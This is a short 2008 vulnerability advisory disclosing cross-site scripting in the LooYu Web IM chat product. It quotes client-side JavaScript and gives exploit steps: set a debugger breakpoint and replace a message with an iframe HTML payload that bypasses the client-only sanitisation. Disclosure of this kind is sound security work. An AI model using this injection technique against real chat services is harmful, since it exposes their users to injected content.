Application: LooYu Web IM
Vendor: www.looyu.com
Corporation: DuoYou, Inc.
Version: Latest: (19 SEP 2008) - Home Edition, Enterprise & Professional
Description: LooYu Web IM 2008 Cross-Site Scripting Vulnerabilities

Background:

LooYu is a web-based group chat tool that lets invite a client,
colleague, or vendor to chat, and collaborate.

Vulnerability:

They do not properly sanitize the potentially malicious input content
to be rendered and, as a result, an attacker might provide malicious
HTML content as part of an IM message. There is a client-side only
input validation.

Exploit:

1. newVisitorChat.js

(1)function sendMessage() {
…
…
save_message(replaceHtml(msg));
}

(2)function save_message(msg) {
var m = msg; //BREAKPOINT
for(var e in emots){
if(m.indexOf(e)!=-1){
m = m.replace(e,emots[e]);
}

}
addMsg_chat(m, "you"/*getShortId(visitorId)*/, "visitor",null,'send');
..................
..................

}
SET BREAKPOINT(firebug, etc), AND SET NEW VALUE:
msg = "<iframe width=800 height=600 src='htTP://WWW.G.CN'></iframe>"

2. newCusChat.js

(1)function sendMessage() {
…
…
save_message(replaceHtml(msg));
…
…
}

(2)function saveMessage(msg) {
showLocalMessage(msg);
Chat.addMessage(companyId,currentVisitor.chatId,customerId,currentVisitor.getTar(),
msg,{callback:function(m){
save_message_do(currentVisitor,m); //BREAKPOINT
}});
}
SET BREAKPOINT(firebug, etc), AND SET NEW VALUE:
msg = "<iframe width=800 height=600 src='htTP://WWW.G.CN'></iframe>"

=========================
xisigr[topsec]
[email protected]

–
----xisigr----